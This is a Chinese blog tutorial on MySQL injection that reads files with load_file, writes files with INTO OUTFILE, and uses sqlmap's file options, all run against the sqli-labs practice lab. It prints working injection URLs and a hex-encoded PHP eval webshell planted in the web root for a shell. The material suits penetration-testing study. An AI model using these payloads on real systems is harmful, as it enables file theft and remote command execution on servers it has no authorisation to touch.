Mysql注入读写文件

最新推荐文章于 2024-07-25 00:29:45 发布
最新推荐文章于 2024-07-25 00:29:45 发布
阅读量3.4k 收藏 6
点赞数 2
分类专栏: 渗透测试学习 Web安全 信息安全 文章标签: sql 数据库 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m_de_g/article/details/121330327
版权
本文详细介绍了如何通过MySQL注入来读取和写入文件,包括设置环境、执行SQL命令以及利用sqlmap工具。在读文件示例中,展示了如何读取E盘的flag.txt,而在写文件部分,不仅演示了写入PHP代码到指定文件,还解决了编码问题以成功获取Webshell。最后,提到了使用sqlmap进行文件操作的安全测试方法。
摘要由CSDN通过智能技术生成

Mysql注入读写文件

1.Mysql注入读文件

MySQL数据库在渗透测试过程中能够使用的功能还是比较多的,除了读取数据之外,还可以进行对文件进行读写(但前提是权限足够)。
读取前提:
1.用户权限足够高,尽量具有root权限。
2.secure_file_priv不为NULL
(1)配置环境
修改mysql.ini的配置
在这里插入图片描述
可以看到里面secure_file_priv =的配置语句,如果没有的看到配置文件的话,需要添加上等号
在这里插入图片描述
当我们执行命令:

show global variables like "secure_file_priv";

返回值为空
在这里插入图片描述
接下来就可以读取本地文件了,我们可以在E盘下新建一个flag.txt的文件,内容任写,记得保存哦,否则你读本地文件的会为空
在这里插入图片描述
执行命令

select load_file("E:\\flag.txt");

在这里插入图片描述
(2)接下来漏洞利用,读取文件sql-labs1

http://172.16.14.190:84/sqli-labs-master/Less-1/?id=-1' union select 1,load_file("E:\\flag.txt"),3 --+

在这里插入图片描述

2.Mysql注入写文件

MySQL数据库在渗透测试过程中能够使用的功能还是比较多的,除了读取数据之外,还可以进行对文件进行读写(但前提是权限足够)。

1.配置环境

set global general_log = on;

在这里插入图片描述
2.实战应用

http://172.16.14.190:84/sqli-labs-master/Less-7/?id=-1')) union select 1,2,'<?php phpinfo();?>' into outfile 'D:\\phpstudy_pro\\WWW\\sqli-labs-master\\Less-7\\1.php' --+

在这里插入图片描述
写入成功

http://172.16.14.190:84/sqli-labs-master/Less-7/123.php

在这里插入图片描述

3.写入Webshell

我们写入一句话木马<?php eval($_REQUEST[1]);?>,一句话建议进行十六进制转码()
转码链接:https://www.sojson.com/hexadecimal.html

在这里插入图片描述
编码后,要在最前面加上0x.payload如下所示

http://127.0.0.1/sqli-labs-master/Less-7/?id=-1')) union select 1,2,'0x3c3f706870206576616c28245f524551554553545b315d293b3f3e' into outfile 'D:\\phpStudy\\PHPTutorial\\WWW\\shell.php' --+

成功写入
在这里插入图片描述
连接webshell
在这里插入图片描述
写入进去到成功了,但是没有解析成功,难过。

在这里插入图片描述
后面询问了大佬一波,问题出在我的编码上,还有就是编码的位置

在这里插入图片描述

http://192.168.31.43/sqli-labs-master/Less-7/?id=-1')) union select 1,0x3c3f706870206576616c28245f504f53545b27636d64275d293b3f3e,3 into outfile 'D:\\phpStudy\\PHPTutorial\\WWW\\shell.php'--+

成功getshell
在这里插入图片描述

4.Sqlmap安全测试

sqlmap安全测试 利用sqlmap进行读写文件
利用sqlmap -hh查看详细的帮助信息

python2 sqlmap.py -hh

在这里插入图片描述

1.sql-map读文件

 python2 sqlmap.py -u "http://192.168.31.43/sqli-labs-master/Less-1/?id=1" --file-read "E:\\flag.txt"

在这里插入图片描述
读取成功之后,找到读取文件的存放路径

在这里插入图片描述
读取文件
在这里插入图片描述
2.sql-map写文件
将E盘中的flag.txt写入到D盘中

python2 sqlmap.py -u "http://192.168.31.43/sqli-labs-master/Less-1/?id=1" --file-write "E:\\flag.txt" --file-dest "D:\\flag.txt"

在这里插入图片描述
ps
1.读写文件的过程中,一定要注意权限和绝对路径;
2.环境配置的问题,会影响我们在渗透测试的过程中,有些时候通,有些时候不通;
3.编码的问题,我就出现此问题,总是getshell失败,避免踩雷

参考链接:https://blog.csdn.net/qq_44159028/article/details/116274542

山川绿水
关注
专栏目录
Python全栈(五)Web安全攻防之7.MySQL注入读写文件和HTTP头中的SQL注入
CUFEECR的博客
03-10 4516
pikachu是一个比较详细的漏洞平台;MySQL读取文件用load_file()函数;文件用into outfile。UPDATEXML()函数用于捕捉错误;在user-agent后加入payload进行user-agent注入;通过修改请求头中的referer进行SQL注入测试,可以通过3种方式进行安全测试;在请求头的cookie参数中加入payload‘进行cookie测试;使用Base64加密的注入语句,插入到Cookie对应的位置完成SQL注入漏洞的探测。
SQL注入读写文件
m0_56578216的博客
08-24 1894
SQL注入有直接SQL注入,也有文件读写时的注入,后者的主要目的在于获取webshell或盗取重要文件。web 应用在服务器上的绝对路径,一般情况下是不知道的。但是系统敏感文件的路径是固定的。secure_file_priv=null,不允许导入导出操作。secure_file_priv=目录名,只允许此目录及子目录下导入导出操作。secure_file_priv= ,不对导入导出操作做限制。
SQL注入-Mysql高权限读写注入
xiaoheizi的博客
06-28 343
1.读写文件时需要知道文件路径,而有的网站会泄露phpinfo.php文件,在phpinfo.php文件中就可以收集路径信息,如:$_SERVER['SCRIPT_FILENAME']就是当前执行脚本的路径。绕过:注入中需要支持SQL执行环境,没有就需要借助phpmyadmin或能够直接连上对方数据库进行绕过。-1 union select null,'null',null,null 正常。-1 union select null,null,'null',null 正常。执行命令,让日志记录后门代码。
SQL注入-文件读写
最新发布
m0_73902453的博客
07-25 1070
就是利用文件读写权限进行注入,它可以入一句话木马,也可以读取系统文件的敏感信息。
[mysql][sql注入]读写文件
qq_37301470的博客
11-14 267
secure_file_priv 全局变量 mysql> show variables like "%secure_file%" -> ; +------------------+-------+ | Variable_name | Value | +------------------+-------+ | secure_file_priv | NULL | +------------------+-------+ 1 row in set, 1 warning (0.00
【24】WEB安全学习----MySQL注入-9(读写文件)
尚未佩妥剑 转眼便江湖
09-22 1819
这一章介绍下MySQL数据库访问操作系统的一些可利用的功能。 一、读文件 MySQL提供了允许load data infile命令高速地从一个文本文件中读取行,并装入一个表中,看下此命令的说明: load data infile '文件名' into table 表名 测试一下导入,提示“The MySQL server is running with the --secure-file...
SQL注入-Mysql注入读写文件
qq_25899635的博客
05-22 7061
Mysql注入文件 mysql数据库在渗透测试过程中能够使用的功能还是比较多的,出了读取数据之外,还可以进行读写(但前提是权限足够)。 读文件前提: 1、用户权限足够高,尽量具有root权限。 2、secure_file_priv不为NULL Mysql文件读写函数 举例:select load_file(’/etc/hosts’) 上面的例子是有条件限制的: 1、必须有权限读取并且文件必须完...
Mysql注入读写文件;HTTP头中的SQL注入;cookie注入以及如何绕过cookie注入
idgrown的博客
02-28 354
1、## 标题:MySQL注入读写文件 1.1、MySQL数据库在对文件读写是要求当前用户拥有的操作权限足够多: 并且查询的数据文件内容不能为空; 读取前提: 1.用户权限足够高,尽量具有root权限 2.secure_file_priv不为null 1…2、读取文件内容: http://127.0.0.1/sqli/Less-1/?id=-1’ union select 1,load_file(...
如何向MYSQL入二进制文件
06-11
介绍如何通过java或jsp向数据库存取二进制图片
mysql 报错注入文件_mysql注入总结
weixin_29802461的博客
01-26 545
目录:0x00 mysql一般注入(select)0x01 mysql一般注入(insert、update)0x02 mysql报错注入0x03 mysql一般盲注0x04 mysql时间盲注0x05 mysql其他注入技巧0x06 mysql数据库版本特性0x07 声明正文:0x00 mysql一般注入(select)1.注释符#/*—2.过滤空格注入使用/**/或()或+代替空格%0c = f...
11、Mysql注入读写文件
weixin_41489908的博客
11-28 155
读取文件 less 1 先在c盘新建一个名为123的txt文件 ,然后访问http://192.168.1.119/sqli/Less-1/?id=-1’ UNION SELECT 1, load_file(“C:\123.txt”),3 --+ 文件 less 7 自动入一个内容为"<?php phpinfo();?>“的文件 http://192.168.1.119/sqli...
mysql 注入文件_关于SQL注入文件读写的方法总结
weixin_35866747的博客
01-19 208
前言SQL注入有直接sql注入也有文件读写时的注入了我们这篇文章介绍的是SQL注入中的文件读写这一块的内容,具体的一起来看看。一、MySQL文件常见的读文件,可以用16进制代替字符串select load_file('c:/boot.ini')select load_file(0x633a2f626f6f742e696e69)select load_file('//ecma.io/1.txt')...
mysql读写文件
Sk1y的博客
04-19 4732
mysql读写文件 文章目录mysql读写文件secure_file_priv参数load_file()secure_file_priv为空secure_file_priv为NULLsecure_file_priv为某一目录load data infilesecure_file_priv为空secure_file_priv为NULLsecure_file_priv为某一目录绕过限制,加上localsystem echo/catmysqlshell的方法直接文件日志注入dumpfile和outfile的区
Web安全第7讲 - MySQL注入读写文件、HTTP头中的SQL注入、绕过SQL注入
Yauger的博客
02-20 441
一、MySQL注入读写文件 1.1 查看是否有权限在mysql读写文件 读取前提: 1.用户权限足够高,尽量具有root权限 2.secure_file_priv不为null 1.1.1 打开命令行查看 show global variables like 'secure_file_priv'; 1.1.2 打开mysql-ini 1.1.3 在最后添加,保存,并重启mysql服务 se...
MYSQL注入|文件读写|获取敏感信息|上传getshell|绕过宽字节、magic_quotes_gpc
没有
04-09 4199
文章目录1.SQL注入的思维导图2.MYSQL注入思维导图3.文件读写获取路径常见方法(1).报错显示(2).遗留文件(3).漏洞报错(4).平台配置文件(5). 爆破文件读写函数(1)load_file():读取函数(2)into outfile或iinto dumpfile:导出函数入WebShell的几种方式 1.SQL注入的思维导图 2.MYSQL注入思维导图 3.文件读写 文件读写操作: load_file():读取函数 into outfile或iinto dumpfile:导出函数 会用
mysql 文件_mysql注入文件
weixin_36333097的博客
01-18 686
select * from admin where id =-1 union select 1,'',3,4 into outfile 'c:\\1.php'select * from admin where id =-1 or 1=1 limit 0,1 INTO OUTFILE 'c:/2.php' LINES TERMINATED BY 0x3C3F70687020706870696E666...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值